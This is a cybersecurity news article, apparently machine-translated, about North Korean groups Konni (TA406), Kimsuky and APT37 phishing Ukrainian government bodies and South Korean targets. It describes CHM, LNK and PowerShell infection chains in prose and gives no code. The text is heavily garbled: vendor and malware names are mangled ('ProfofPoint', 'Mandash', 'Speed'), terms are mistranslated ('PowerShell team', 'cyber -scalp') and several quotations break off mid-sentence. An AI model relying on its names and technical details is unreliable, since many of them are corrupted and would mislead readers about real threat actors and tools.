The actor associated with North Korea, known as the Konni APT, was associated with a phishing company aimed at government agencies in Ukraine, which testifies to the actor’s actor Targeting the frame of Russia.
Enterprise ProfofPoint security company said the company’s ultimate goal is to collect intelligence over the “Russian invasion trajectory”.
“The group’s interest in Ukraine follows – Note In a report that shared with Hacker News.
Konni Aptalso known as heating dreams, osmium, ta406, and KnowledgeIt is a group of cyber -scalp, which has a history of orientation on the organization of South Korea, the USA and Russia. It has been operating at least since 2014.
The attacks installed by the actor threats often involve the use of phishing sheets to distribute malicious software called Konni Rat (aka UPDOG) and redirected the recipients to the granting pages. Profofpoint, in analysis From a group of threats published in November 2021, he appreciated the TA406 to become one of several actors who are publicly tracked as Kimusuk, Talium and Conni.
The latest set of attacks recorded by cybersecurity company entails the use of phishing sheets that represent a fictitious senior employee in the analytical center called the Royal Institute of Strategic Studies, which is also a non -existent organization.
E-mail messages contain a link to a protected RAR archive located on mega-consuming service. The opening of the RAR archive using the password mentioned in the message triggers a sequence of infection that is designed for extensive disruption machines.
In particular, the RAR archive has a CHM file that reflects the content of the bait related to former Ukrainian military leader Valery Zaluzhia. When the victim pressed anywhere on the page, the PowerShell team built into HTML is executed to get to the external server and load the useful PowerShell load at the next stage.
A recently launched PowerShell script is capable of performing different teams to collect information about the system, CAUDS using the Base64 coding and sending to the same server.
“The actor sent several phishing emails on days in a row, if the target did not follow the link, asking the target whether they received previous letters, and if they load the files,” the researchers said.
ProfofPoint said it also watched as the HTML file directly spreads as an attachment to phishing messages. In this variation, the victim’s attack is instructed to click on the built -in link to the HTML file, causing the ZIP archive download, which includes a benign PDF and Windows (LNK) shortcut.
When LNK launches, it performs PowerShell, coded Base64 to give up the file coded by JavaScript called “Themes.jse” using the Visual Basic scenario. JSE’s malicious software, in turn, turns to the URL-controlled attacker and launches the server’s response via PowerShell. The exact nature of the useful load is now unknown.
In addition, TA406 was noticed trying to gather powers by sending fake reports of Microsoft security Ukrainian state subjects with protonmail accounting, warning them about the suspicious entry activity with IP addresses located in the US, and calling them to check out the login by visiting the link.
At the time The same compromised domain It is said that the past was used to collect Naver entry information.
“These accumulations in the procurement have taken place before the attempts to deploy malware and aimed at some of the same users who are later focused on HTML’s delivery company,” Prufpoint said. “TA406 is probably collecting exploration to help the North Korean leadership determine the current risk for their forces already in the theater, as well as the likelihood that Russia asks for more troops and weapons.”
“Unlike Russian groups, which were probably the tasks of assembling information about the tactical battlefield and orientation on Ukrainian forces in situ, Ta406 was usually focused on more strategic, political collection efforts.”
The disclosure of information happens the way was the Konni group related to a complex multi -stage malicious program focused on South Korea’s organization with ZIP archives containing LNK files that launch PowerShell scripts to get the cabin archive and ultimately provide a party scenario for malicious software capable of collecting sensitive data and studying it on a remote server.
The conclusions are also made with spears-fining company organized Kimas For orientation to government bodies in South Korea, providing malicious software for theft, capable of installing command files and control (C2 or C & C) communications and file exports, data data and cryptocurrency wallet information.
According to the South Korean Cybersecurity Company Ahnlab, Kimusuki is also distributed Mandash Within a multi -stage sequence of infection initiated by a spear. Trojan was assigned to the US government with a Lazar group in May 2020.
“While the Kimsuky group uses different types of malware, in case of pebbledash, they perform malicious programs – Note.
“They then use the PowerShell scenario to create the task planner and register it for automatic execution. Thanks to the C&C Socket Dropbox and TCP server, the group sets some malware and tools, including pebblesh.”
Horses and Kimusuki are far from the united North Korean threats that focused on Seoul. Most recently, in March 2025, South Korean structures were recognized in the reception of another company that is carried out APT37which is also called Starcruft.
The “Spira-Fishing” attacks, called “Toybox Story”, nominated several North Korea activists, according to the Genians Security Center (GSC). The first observed Physhing -Dida attack took place on March 8, 2025.
“The e -mail contained a Dropbox link that led to a compressed archive that included a harmful label (LNK),” South Korean company – Note. “When extracting and executing, the LNK file has activated additional malware containing the keyword” toy “.
LNK files are tuned to run the HWP Decoy file and launch PowerShell commands, which will lead to files with the name toy03.bat, Toy02.bat and Toy01.bat (in this order), the last of which contains Shellcode to launch Rokrat, Create, related to APT37.
Speed Equipped to collect system information, seizure of screenshots and use three different cloud services, including PCloud, Yandex and Dropbox for C2.
“The actors threaten the legitimate cloud services as the C2 infrastructure and continued to change fast access files (LNK), focusing on the hopeless attack methods to avoid detecting antiviral software installed on the target final points,” said geniuses.
